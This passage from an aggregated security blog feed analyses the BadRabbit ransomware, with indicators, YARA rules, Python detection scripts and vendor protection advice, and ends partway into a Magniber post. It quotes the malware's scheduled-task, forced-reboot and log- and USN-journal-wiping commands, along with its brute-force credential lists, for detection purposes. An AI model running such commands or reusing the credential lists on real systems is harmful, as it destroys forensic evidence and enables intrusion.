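        hits[host].update(match_rules(cmdline))
    return dict(hits)


def hosts_at_risk(lines, threshold=3):
    """Hosts that tripped at least `threshold` distinct rules.

    A lone schtasks /Create or rundll32 call is routine administration; the
    BADRABBIT chain fires several of these rules on one host within seconds,
    so the correlation threshold separates the two without per-rule tuning.
    """
    return sorted(h for h, rules in scan(lines).items() if len(rules) >= threshold)


if __name__ == "__main__":
    for host, rules in sorted(scan(SAMPLE_LOG).items()):
        print(host, sorted(rules))
    print("at risk:", hosts_at_risk(SAMPLE_LOG))
```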

We would like to thank Edward Fjellskål for his assistance with research for this blog.

Indicators

File: Install_flashPlayer.exe
Hash: FBBDC39AF1139AEBBA4DA004475E8839
Description: install_flashplayer.exe drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A
Description: 32 or 64-bit DiskCryptor driver

File: <rand_4_hex>.tmp
Hash: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977
Description: 32 or 64-bit Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: \system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note that “15” is the default value present in the malware and may be altered by specifying a different value on command line when executing install_flash_player.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id
Description: Creates the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%WINDIR%\system32\shutdown.exe /r /t 0 /f" /ST <HH:MM:00>
Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System & wswevtutil cl Security & wswevtutil cl Application & fsutil usn deletejournal /D <current_drive_letter>:
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run: "<%COMSPEC%> /C Start \"\" \"<dispci_exe_path>\" -id <rand_task_id> && exit"
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run: "%WINDIR%\system32\shutdown.exe /r /t 0 /f"
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
Admin
Guest
User
User1
user-1
Test
root
buh
boss
ftp
rdp
rdpuser
rdpadmin
manager
support
work
other user
operator
backup
asus
ftpuser
ftpadmin
nas
nasuser
nasadmin
superuser
netguest
alex
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Administrator
administrator
Guest
guest
User
user
Admin
admin
Test
test
root
123
1234
12345
123456
1234567
12345678
123456789
1234567890
Administrator123
administrator123
Guest123
guest123
User123
user123
Admin123
admin123
Test123
test123
password
111111
55555
77777
777
qwe
qwe123
qwe321
qwer
qwert
qwerty
qwerty123
zxc
zxc123
zxc321
zxcv
uiop
123321
321
love
secret
sex
god
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
atsvc
browser
eventlog
lsarpc
netlogon
ntsvcs
spoolss
samr
srvsvc
scerpc
svcctl
wkssvc

Yara Rules

rule FE_Hunting_BADRABBIT
    {
        meta:
            version = ".2"
            filetype = "PE"
            author = "ian.ahl @TekDefense & nicholas.carr @itsreallynick"
            date = "2017-10-24"
            md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
        strings:
            // Messages
            $msg1 = "Incorrect password" nocase ascii wide
            $msg2 = "Oops! Your files have been encrypted." ascii wide
            $msg3 = "If you see this text, your files are no longer accessible." ascii wide
            $msg4 = "You might have been looking for a way to recover your files." ascii wide
            $msg5 = "Don't waste your time. No one will be able to recover them without our" ascii wide
            $msg6 = "Visit our web service at" ascii wide
            $msg7 = "Your personal installation key#1:" ascii wide
            $msg8 = "Run DECRYPT app at your desktop after system boot" ascii wide
            $msg9 = "Password#1" nocase ascii wide
            $msg10 = "caforssztxqzf2nm.onion" nocase ascii wide
            $msg11 = /partition (unbootable|not (found|mounted))/ nocase ascii wide

            // File references
            $fref1 = "C:\\Windows\\cscc.dat" nocase ascii wide
            $fref2 = "\\\\.\\dcrypt" nocase ascii wide
            $fref3 = "Readme.txt" ascii wide
            $fref4 = "\\Desktop\\DECRYPT.lnk" nocase ascii wide
            $fref5 = "dispci.exe" nocase ascii wide
            $fref6 = "C:\\Windows\\infpub.dat" nocase ascii wide

            // META
            $meta1 = "http://diskcryptor.net/" nocase ascii wide
            $meta2 = "dispci.exe" nocase ascii wide
            $meta3 = "GrayWorm" ascii wide
            $meta4 = "viserion" nocase ascii wide

            // Commands
            $com1 = "ComSpec" ascii wide
            $com2 = "\\cmd.exe" nocase ascii wide
            $com3 = "schtasks /Create" nocase ascii wide
            $com4 = "schtasks /Delete /F /TN %ws" nocase ascii wide
        condition:
            (uint16(0) == 0x5A4D)
            and
            (8 of ($msg*) and 3 of ($fref*) and 2 of ($com*))
            or
            (all of ($meta*) and 8 of ($msg*))
    }

rule FE_Trojan_BADRABBIT_DROPPER
    {
        meta:
            author = "muhammad.umair"
            md5 = "fbbdc39af1139aebba4da004475e8839"
            rev = 1
        strings:
            $api1 = "GetSystemDirectoryW" fullword
            $api2 = "GetModuleFileNameW" fullword
            $dropped_dll = "infpub.dat" ascii fullword wide
            $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
            $extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D 8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
    }

rule FE_Worm_BADRABBIT
    {
        meta:
            author = "muhammad.umair"
            md5 = "1d724f95c61f1055f0d02c2154bbccd3"
            rev = 1
        strings:
            $api1 = "WNetAddConnection2W" fullword
            $api2 = "CredEnumerateW" fullword
            $api3 = "DuplicateTokenEx" fullword
            $api4 = "GetIpNetTable"
            $del_tasks = "schtasks /Delete /F /TN drogon" ascii fullword wide
            $dropped_driver = "cscc.dat" ascii fullword wide
            $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
            $iter_encrypt = { 8D 44 24 3C 50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66 3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ?? }
            $share_fmt_str = "\\\\%ws\\admin$\\%ws" ascii fullword wide
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
    }

rule FE_Trojan_BADRABBIT_MIMIKATZ
    {
        meta:
            author = "muhammad.umair"
            md5 = "37945c44a897aa42a66adcab68f560e0"
            rev = 1
        strings:
            $api1 = "WriteProcessMemory" fullword
            $api2 = "SetSecurityDescriptorDacl" fullword
            $api_str1 = "BCryptDecrypt" ascii fullword wide
            $mimi_str = "CredentialKeys" ascii fullword wide
            $wait_pipe_seq = { FF 15 ?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24 1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 75 3B }
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
    }

rule FE_Trojan_BADRABBIT_DISKENCRYPTOR
    {
        meta:
            author = "muhammad.umair"
            md5 = "b14d8faf7f0cbcfad051cefe5f39645f"
            rev = 1
        strings:
            $api1 = "CryptAcquireContextW" fullword
            $api2 = "CryptEncrypt" fullword
            $api3 = "NetWkstaGetInfo" fullword
            $decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8 00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8 56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F }
            $msg1 = "Disk decryption progress..." ascii fullword wide
            $task_fmt_str = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" ascii fullword wide
            $tok1 = "\\\\.\\dcrypt" ascii fullword wide
            $tok2 = "C:\\Windows\\cscc.dat" ascii fullword wide
        condition:
            (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 150KB and all of them
    }         

How McAfee Products Can Protect Against BadRabbit Ransomware

McAfee is leading the way in how enterprises protect against emerging threats such as BadRabbit ransomware, remediate complex security issues, and combat attacks with an intelligent end-to-end security platform that provides adaptable and continuous protection as a part of the threat defense life cycle.

McAfee had zero-day protection for components of the initial BadRabbit attack in the form of behavioral, heuristic, application control, and sandbox analyses. This post provides an overview of those protections with the following products:

Frequently updated technical details can be found in the McAfee Knowledge Center article KB89335. We will update this post as more product information becomes available.

McAfee Endpoint Protection (ENS)

Dynamic Application Control (DAC) successfully provided our customers with zero-day protection from BadRabbit ransomware and prevented any potential damage from occurring when “Security” mode is enabled.

In addition, McAfee Endpoint Security mitigation methods for assorted malware are available in the following product guide.

Access Protection Rules: Setting up access protection rules to prevent the creation of the following files prevents the ransomware from executing and encrypting files:

  • C:\Windows\cscc.dat
  • C:\Windows\infpub.dat
  • C:\Windows\dispci.exe

The following screenshots show steps for creating rules for McAfee ENS:

Figure 1.

Figure 2. 

Figure 3.

Figure 4.

McAfee VirusScan Enterprise (VSE)

The following screenshots show steps for creating Access Protection Rules for McAfee VirusScan Enterprise (VSE). For VSE, one rule must be created for each file mentioned in the behavior section:

Figure 5.

Figure 6.

Figure 7.

Enabling Joint Threat Intelligence (JTI) Rules 239 and 242 also prevents the ransomware from executing.

McAfee Threat Intelligence Exchange (TIE)

McAfee Threat Intelligence Exchange (TIE) further enhances a customer’s security posture. With the ability to aggregate reputation verdicts from ENS, VSE, McAfee Web Gateway, and McAfee Network Security Platform, TIE can quickly share reputation information related to BadRabbit with any integrated vector. By providing the ability to use Global Threat Intelligence (GTI) for a global reputation query, TIE also enables integrated products to make an immediate decision prior to execution of the ransomware payload, and leverage the reputation cached in the TIE database.

There are currently three samples associated with this ransomware campaign, representing the dropper and the main executable. Their hashes could be added manually, although GTI updates these file hashes automatically:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

 

McAfee Network Security Platform (NSP)

McAfee NSP is one product that quickly responds to prevent exploits and protect assets within networks. The McAfee NSP team works diligently to develop and deploy user-defined signatures (UDS) for critical matters. Within a 24-hour period, several UDS were created and uploaded for customers to deploy on their network sensors. In this case, the UDS explicitly targeted the exploit tools EternalBlue, Eternal Romance SMB Remote Code Execution, and DoublePulsar. There were also related indicators of compromise released that could be added to a blacklist to block potential threats associated with the original Trojan.

A Network Security Platform Emergency User Defined Signature (UDS) has been created to detect this threat. The UDS and its release notes are available for download from Knowledge Base article KB55447.

IMPORTANT:
Use Emergency_UDS_1.zip with NSM versions 8.1.x.x and 8.3.x.x
Use Emergency_UDS_2.zip with NSM version 9.1.x.x

Please read the release notes carefully for important information.

Knowledge Base article KB55447 is available only to registered users. Log in to https://support.mcafee.com and search for the article ID.

McAfee products using DAT files 

On October 25, McAfee released DAT 8695 to include coverage for BadRabbit ransomware and variants.

The post How McAfee Products Can Protect Against BadRabbit Ransomware appeared first on McAfee Blogs.

Following The Bad Rabbit

On October 24th, media outlets reported on an outbreak of ransomware affecting various organizations in Eastern Europe, mainly in Russia and Ukraine. Identified as “Bad Rabbit”, initial reports about the ransomware drew comparisons with the WannaCry and NotPetya (EternalPetya) attacks from earlier this year. Though F-Secure hasn’t yet received any reports of infections from our own customers, we’re actively investigating. And while the investigation is still ongoing, initial results from our analysis did find similarities between Bad Rabbit and the NotPetya ransomware that hit companies late last June.

We think there’s good evidence that suggests the same person or group is responsible for both last June’s NotPetya attacks and what we’re seeing now with Bad Rabbit. Malware authors often learn from what works, so finding the same characteristics in different families is not uncommon. But the similarities we’re seeing here are too much to be just one attacker copying another.

Without getting too technical, here’s a handful of the similarities between NotPetya and Bad Rabbit:

  • Overall code structure is similar
  • File encryption code is VERY similar
  • Similar method of checking existing processes and encrypting files
  • Similar method used to reboot computers
  • Same trick used to launch the malware’s main component as a DLL
  • Identical code used to parse the command line
  • Similar propagation methods, including an identical “library” of other computers found in the network, and use of Mimikatz to gather credentials
  • Out of 113 file extensions used by BadRabbit, 65 are shared with NotPetya (Bad Rabbit has an additional 48)

There are also some notable differences between the two, including:

  • Bad Rabbit doesn’t use EternalBlue/EternalRomance exploit
  • Bad Rabbit doesn’t use PsExec to spread
  • Bad Rabbit also encrypts “home user” files, such as .jpgs
  • Bad Rabbit adds “.encrypted” to the contents of affected files (NotPetya didn’t do this, making it harder to distinguish between encrypted and non-encrypted files)
  • Bad Rabbit’s infection vector is via compromised websites, while NotPetya was reported to be via MeDoc
  • Bad Rabbit brute-forces using a set of predefined credentials to available SMB shares
  • The list of process hashes to be compared against is different from NotPetya’s. NotPetya compares against Symantec and Kaspersky processes, while Bad Rabbit compares against McAfee and DrWeb

Like NotPetya, Bad Rabbit displays two ransom notes – one for MBR encryption.

Bad Rabbit Message

And a text note for file encryption.

Oops! Your files have been encrypted.

If you see this text, your files are no longer accessible.
You might have been looking for a way to recover your files.
Don't waste your time. No one will be able to recover them without our
decryption service.

We guarantee that you can recover all your files safely. All you
need to do is submit the payment and get the decryption password.

Visit our web service at caforssztxqzf2nm.onion

Your personal installation key#2: [REDACTED]

Users are directed to pay the ransom at a specified payment site, which also provides the amount of the ransom to be paid.

Bad Rabbit Payment Site

A threat description of the Bad Rabbit ransomware is available at Trojan:W32/Rabbad and will be updated as and when more details are confirmed.

In the meantime… our endpoint protection products have a variety of measures baked in that prevent Bad Rabbit infections.


Edited to update: Struck through the EternalRomance mention above. We have verified the same observations as Cisco Talos Security about EternalRomance being exploited by Bad Rabbit.

New Ransomware: This Time the Wolf Is Out in Rabbit’s Clothing

Since yesterday a new wave of ransomware has been under way, so far targeting mainly Russia, Ukraine and parts of Europe. Our SophosLabs specialist Chester Wisniewski has taken a closer look at “Bad Rabbit” and is not really surprised by its appearance. “It was really only a matter of time before someone took the ideas and techniques […]

‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine

This post was researched and written by Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee, and Raj Samani.

McAfee is currently investigating a ransomware campaign known as BadRabbit, which initially infected targets in Russia and the Ukraine. We are also investigating reports of infected systems in Germany, Turkey, and Bulgaria and will provide updates as more information becomes available. For McAfee product coverage, please see “How McAfee Products Can Protect Against BadRabbit Ransomware.”

When victims visit the following site, a dropper is downloaded:

hxxp://1dnscontrol[dot]com/flash_install.php

After infection, the victim sees the following screen:

The ransomware is currently charging 0.05 Bitcoin; however, there is no confirmation that paying the ransom will result in a decryption key being provided.

A decryption site at the following .onion (Tor) domain displays the time that victims have left before the price goes up:

caforssztxqzf2nm[dot]onion

Files with the following extensions are encrypted:

.3ds .7z .accdb .ai .asm .asp .aspx .avhd .back .bak .bmp .brw .c .cab .cc .cer .cfg .conf .cpp .crt .cs .ctl .cxx .dbf .der .dib .disk .djvu .doc .docx .dwg .eml .fdb .gz .h .hdd .hpp .hxx .iso .java .jfif .jpe .jpeg .jpg .js .kdbx .key .mail .mdb .msg .nrg .odc .odf .odg .odi .odm .odp .ods .odt .ora .ost .ova .ovf .p12 .p7b .p7c .pdf .pem .pfx .php .pmf .png .ppt .pptx .ps1 .pst .pvi .py .pyc .pyw .qcow .qcow2 .rar .rb .rtf .scm .sln .sql .tar .tib .tif .tiff .vb .vbox .vbs .vcb .vdi .vfd .vhd .vhdx .vmc .vmdk .vmsd .vmtm .vmx .vsdx .vsv .work .xls .xlsx .xml .xvd .zip

The malware starts a command-line with following values:

Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1082924949 && exit"

“/TN rhaegal” refers to a system account with the name rhaegal used to create the scheduled task and start the ransomware file dispci.exe. Rhaegal is likely a reference to a dragon from the popular TV show “Game of Thrones.” In fact, three dragon names—Rhaegal, Viserion, and Drogon—are used in relation to the following scheduled tasks:

The malware then uses the following commands to clear security logs and delete the update sequence number (USN) change journal, which can otherwise be used to recover files:

Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

The USN change journal provides a persistent log of all changes made to files on the volume, according to the Microsoft Developer Network. As files, directories, and other NTFS objects are added, deleted, and modified, NTFS enters records into the USN change journal, one for each volume on the computer. Each record indicates the type of change and the object changed. New records are appended to the end of the stream.
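The scheduled-task, log-clearing and dropped-file artifacts described above (together with the three file paths given for the Access Protection rules earlier on this page) can be turned into straightforward endpoint-telemetry checks. This is an added example, not McAfee's code: the event records are constructed (kind, payload) samples, and the program run by the constructed viserion task is a placeholder.

```python
"""Flag BadRabbit host artifacts in endpoint telemetry (added example).

Indicators are the ones named on this page: the files cscc.dat, infpub.dat and
dispci.exe dropped into the Windows directory, the dragon-named scheduled
tasks, and the wevtutil/fsutil command line that clears event logs and the
USN journal. Events are constructed (kind, payload) tuples, not sensor output.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

TASK_NAMES = {"rhaegal", "viserion", "drogon"}
DROPPED_FILES = {
    r"c:\windows\cscc.dat",
    r"c:\windows\infpub.dat",
    r"c:\windows\dispci.exe",
}
CLEARED_LOGS = {"setup", "system", "security", "application"}

_TASK_NAME_RE = re.compile(r"/tn\s+(?P<name>[^\s\"]+)", re.IGNORECASE)
_WEVTUTIL_CLEAR_RE = re.compile(r"wevtutil\s+cl\s+(?P<log>\w+)", re.IGNORECASE)
_USN_DELETE_RE = re.compile(r"fsutil\s+usn\s+deletejournal", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    event_no: int  # 1-based position in the event stream
    rule: str
    detail: str


def check_file_create(event_no: int, path: str) -> Optional[Finding]:
    """One of the three files the Access Protection rules block was written."""
    if path.lower() in DROPPED_FILES:
        return Finding(event_no, "badrabbit_dropped_file", path)
    return None


def check_process_create(event_no: int, cmdline: str) -> List[Finding]:
    """Scheduled-task creation and anti-forensic commands from the analysis."""
    findings: List[Finding] = []
    low = cmdline.lower()

    # schtasks /Create with a dragon task name, or any task that runs dispci.exe.
    if "schtasks" in low and "/create" in low:
        m = _TASK_NAME_RE.search(cmdline)
        name = m.group("name") if m else ""
        base = name.lower().split("_")[0]  # viserion_%u -> viserion
        if base in TASK_NAMES or "dispci.exe" in low:
            findings.append(Finding(event_no, "badrabbit_scheduled_task", f"task={name}"))

    # wevtutil cl on several logs, chained with deletion of the USN journal.
    logs = {m.group("log").lower() for m in _WEVTUTIL_CLEAR_RE.finditer(cmdline)}
    cleared = logs & CLEARED_LOGS
    deletes_usn = _USN_DELETE_RE.search(cmdline) is not None
    if (cleared and deletes_usn) or len(cleared) >= 3:
        findings.append(Finding(event_no, "event_log_and_usn_wipe",
                                f"logs={sorted(cleared)} usn_deleted={deletes_usn}"))
    return findings


def scan(events: Iterable[Tuple[str, str]]) -> List[Finding]:
    """Run every event through the matching check and collect the findings."""
    out: List[Finding] = []
    for event_no, (kind, payload) in enumerate(events, start=1):
        if kind == "FileCreate":
            f = check_file_create(event_no, payload)
            if f is not None:
                out.append(f)
        elif kind == "ProcessCreate":
            out.extend(check_process_create(event_no, payload))
    return out


# Constructed sample events; command lines 3 and 5 follow the ones quoted above.
SAMPLE_EVENTS = [
    ("FileCreate", r"C:\Windows\infpub.dat"),
    ("FileCreate", r"C:\Users\alice\Documents\report.docx"),
    ("ProcessCreate", r'Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal '
                      r'/TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" '
                      r'-id 1082924949 && exit"'),
    ("ProcessCreate", r'schtasks /Create /SC ONCE /TN viserion_23 /RU SYSTEM '
                      r'/TR "C:\Windows\system32\cmd.exe /C exit" /ST 14:35:00'),  # placeholder /TR
    ("ProcessCreate", r"Cmd /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security "
                      r"& wevtutil cl Application & fsutil usn deletejournal /D C:"),
    ("ProcessCreate", r'schtasks /Create /SC DAILY /TN BackupNightly /TR "C:\Tools\backup.exe"'),
    ("ProcessCreate", r"wevtutil cl Application"),  # a single log clear: routine admin action
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_no}: {f.rule} ({f.detail})")
```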

We also found a DNS query to ACA807##.ipt.aol[dot]com, in which “##” is a two-digit hex number from 00 to FF.

We created a graph of the events occurring during an infection by one of the BadRabbit samples. The initial binary loads itself into memory and kills the initial process. Further processes drop configuration, services files, and other artifacts used in the attacks. The graph ends with the creation of the preceding scheduled tasks.

Embedded Credentials

One of the samples (579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648) seems to contain a list of default credentials with an attempt to brute-force credentials and get the scheduled tasks to execute the ransomware:

  • secret
  • 123321
  • zxc321
  • zxc123
  • qwerty123
  • qwerty
  • qwe321
  • qwe123
  • 111111
  • password
  • test123
  • admin123Test123
  • Admin123
  • user123
  • User123
  • guest123
  • Guest123
  • administrator123
  • Administrator123
  • 1234567890
  • 123456789
  • 12345678
  • 1234567
  • 123456
  • adminTest
  • administrator
  • netguest
  • superuser
  • nasadmin
  • nasuser
  • ftpadmin
  • ftpuser
  • backup
  • operator
  • other user
  • support
  • manager
  • rdpadmin
  • rdpuser
  • user-1
  • Administrator

Game of Thrones Fans?

It is common for attackers to use pop-culture references in their attacks. These attackers seem to have an interest in “Game of Thrones,” with at least three references to the series. Viserion, Rhaegal, and Drogon are names of scheduled tasks. GrayWorm, the name of a “Game of Thrones” commander, is the product name in the binary’s EXIF data.

Detection

There are currently three samples associated with this ransomware campaign, representing the dropper and the main executable. McAfee detects all three:

  • 630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
  • 8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93
  • 579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648

 

The post ‘BadRabbit’ Ransomware Burrows Into Russia, Ukraine appeared first on McAfee Blogs.

Stopping ransomware where it counts: Protecting your data with Controlled folder access

Windows Defender Exploit Guard is a new set of host intrusion prevention capabilities included with Windows 10 Fall Creators Update. One of its features, Controlled folder access, stops ransomware in its tracks by preventing unauthorized access to your important files.

Encryption should protect your data and files. Ransomware twists the power of encryption against you and uses it to take files hostage. This means losing control of your data: documents, precious photos and videos, and other important files.

For enterprises and small businesses, losing access to files can mean disrupted operations. Worse, for critical infrastructure, ransomware infection can halt the delivery of services. Just this year, successive ransomware campaigns and no less than two global outbreaks immobilized hospitals, transport systems, and other high-tech facilities.

Ransomware continues to evolve and impact many types of devices in different environments. At Microsoft, we continue to harden Windows 10 against ransomware and other threats. Our end-to-end security suite integrates multiple next-generation defense technologies that help our customers prevent, detect, and respond to ransomware attacks.

Controlled folder access adds another layer of real-time protection against ransomware.

Crackdown on unauthorized encryption

Ransomware campaigns continue to grow and thrive as they are a lucrative business for cybercriminals. Ransomware gets into a victim’s device, encrypting files and data. Because these files are held hostage, cybercriminals can extort money from their victims.

Controlled folder access brings you right back in control of determining what programs can access your data. This feature protects your files from tampering, in real-time, by locking folders so that ransomware and other unauthorized apps can’t access them. It’s like putting your crown jewels in a safe whose key only you hold.

Cybercriminals can’t extort money if they can’t encrypt your files. Controlled folder access is a powerful tool that can render ransomware attacks worthless.

How Controlled folder access works

Controlled folder access locks down folders, allowing only authorized apps to access files. Unauthorized apps, including malicious executable files, DLLs, and scripts are denied access to folders.

This feature can be enabled in Windows Defender Security Center app in Windows 10.

By default, Controlled folder access protects common folders where documents and other important data are stored. But it’s also flexible. You can add additional folders to protect, including those on other drives. You can also allow apps that you trust to access protected folders, so if you’re using unique or custom programs, your productivity is not affected.

When enabled, Controlled folder access prevents access by unauthorized apps and notifies you of an attempt to access or modify files in protected folders. It delivers this protection in real-time.

Enabling and managing Controlled folder access in enterprise networks

In enterprise environments, Controlled folder access can also be enabled and managed using Group Policy, PowerShell, or configuration service providers for mobile device management.

The Controlled folder access feature seamlessly integrates with Windows Defender Advanced Threat Protection. Every time Controlled folder access blocks an attempt to make changes to protected folders, an alert is generated on Windows Defender ATP. This notifies security operations personnel to take quick response actions, including quarantining affected machines or blocking the unauthorized app from running on other machines.

As with the other Windows Defender Exploit Guard features, administrators can customize notifications that appear on endpoints in the event of an intrusion attempt. Customized notifications then allow employees to call, email, or IM their company’s help desk.

Controlled folder access and other Windows Defender Exploit Guard features include an audit mode that administrators can use to evaluate these security features in enterprise networks. In audit mode, the Controlled folder feature does not block attempts to modify files on protected folders, but logs all events, so administrators can assess Windows Defender Exploit Guard capabilities without impacting operations.

A comprehensive suite of advanced ransomware protection in Windows 10

Ransomware attacks grow more and more sophisticated every day. To keep you safe, we are continually improving Windows to protect against ransomware and other threats. Windows 10 is the safest version of Windows yet. Controlled folder access is designed to help reduce the risk of ransomware attacks, keeping your user and businesses data safe.

 

Tanmay Ganacharya (@tanmayg)

Principal Group Manager, Windows Defender Research

 

Note these additional Windows security features

Windows 10 S is a configuration of Windows 10 that’s streamlined for security and performance. Windows 10 S provides Microsoft-vetted security by working exclusively with apps from the Windows Store and by using Microsoft Edge as the default browser.

Windows 10 customers are also protected from ransomware with Windows Defender Antivirus. With advanced machine learning models, as well as generic and heuristic techniques Windows Defender Antivirus detects new as well as never-before-seen ransomware in real-time.

Microsoft Edge blocks ransomware infection from the web by opening pages within low privilege app containers and by using reputation-based blocking of malicious downloads. Microsoft Edge has been providing industry-leading online protection for Windows 10 customers since its release. This year, Microsoft Edge is now available on iOS and Android, so users of these platforms can start benefiting from browser security beyond sandboxing.

In enterprise environments there are additional layers of protection. Device Guard provides virtualization-based lockdown security. It blocks all types of unauthorized content, stopping ransomware and other threats from reaching the machine.

In addition to Microsoft Edge, enterprises can also ensure online safety by blocking ransomware attacks that begin with email. Microsoft Exchange Online Protection (EOP) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. Office 365 Advanced Threat Protection helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection.

Windows Defender ATP powers security operations personnel to detect and respond to malware outbreaks in their organization. Windows Defender ATP’s enhanced behavioral and machine learning detection libraries flag malicious behavior across the ransomware infection process. The new process tree visualization and improvements in machine isolation help security operations to investigate and respond to ransomware and other malicious attacks.

Controlled folder access is a new piece to this growing stack of next-gen solutions that help you prevent, detect, and respond to ransomware and other modern attacks.

Controlled folder access, Exploit Protection, Attack surface reduction, and Network protection make up the host intrusion prevention capabilities in Windows Defender Exploit Guard. These features and all the other next-gen security technologies that ship with the Fall Creators Update continue to make Windows 10 the safest, most secure Windows ever.

Learn more about Windows 10 Fall Creators Update

Microsoft 365 Security and Management Features Available in Fall Creators Update

Windows Defender Exploit Guard: Reduce the attack surface against next-generation malware

Stopping ransomware where it counts: Protecting your data with Controlled folder access

Making Microsoft Edge the most secure browser with Windows Defender Application Guard

Introducing Windows Defender Application Control

Hardening the system and maintaining integrity with Windows Defender System Guard

Move away from passwords, deploy Windows Hello. Today!

What’s new in Windows Defender ATP Fall Creators Update

Antivirus evolved

Get the latest information on ransomware

Our ransomware FAQ page summarizes the latest developments in the ransomware landscape. It has information about the most prevalent ransomware families like Cerber, WannaCrypt, Spora, Teerac (also known as Crypt0L0cker or CryptoLocker), and Locky, as well as the latest notable ransomware families like Tibbar (also known as Bad Rabbit), Ronggolawe, Petya (also referred to as NotPetya), Erebus, and others.

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft community.

Follow us on Twitter @MMPC and Facebook Microsoft Malware Protection Center

 

Magniber Ransomware Wants to Infect Only the Right People

Introduction

Exploit kit (EK) use has been on the decline since late 2016; however, certain activity remains consistent. The Magnitude Exploit Kit is one such example that continues to affect users, particularly in the APAC region.

In Figure 1, which is based on FireEye Dynamic Threat Intelligence (DTI) reports shared in March 2017, we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017.


Figure 1: Magnitude EK distribution as seen in March 2017

This trend continued until late September 2017, when we saw Magnitude EK focus primarily on the APAC region, with a large chunk targeting South Korea. Magnitude EK activity then fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined (we have also seen a decline of Cerber being distributed via email) and now it is distributing ransomware known as Magniber. 

Infection

The first reappearance of Magnitude EK on Oct. 15 came as a malvertising redirection from the domain: fastprofit[.]loan. The infection chain is shown in Figure 2.


Figure 2: Infection chain

The Magnitude EK landing page consisted of CVE-2016-0189, which was first reported by FireEye as being used in Neutrino Exploit Kit after it was patched. Figure 3 shows the landing page and CVE usage.


